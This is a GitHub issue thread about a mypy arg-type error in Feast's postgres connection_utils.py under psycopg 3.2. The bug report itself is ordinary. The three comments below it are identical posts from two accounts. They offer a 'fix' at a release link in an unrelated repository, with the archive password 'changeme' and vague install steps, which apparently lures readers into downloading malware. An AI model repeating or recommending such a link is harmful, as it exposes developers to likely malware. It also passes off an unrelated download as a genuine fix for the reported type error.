### ISSUE TITLE
mypy arg-type failure in postgres/connection_utils.py with psycopg>=3.2

### ISSUE THREAD

**Issue by cburroughs** [feast-dev/feast#4463]
## Expected Behavior 

Type checking should pass

## Current Behavior

With `psycopg>=3.2`,

```
feast/infra/utils/postgres/connection_utils.py:66: error: Argument 2 to "make_conninfo" has incompatible type "**dict[str, object]"; expected "str | int | None"  [arg-type]
```

## Steps to reproduce

 * Get your dev environment to the point where you can run make lint-python
 * `pip install --upgrade 'psycopg>=3.2'`
  * make lint-python` --> the above error

**Comment by syedmaaz9905** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by robykartis** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by robykartis** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
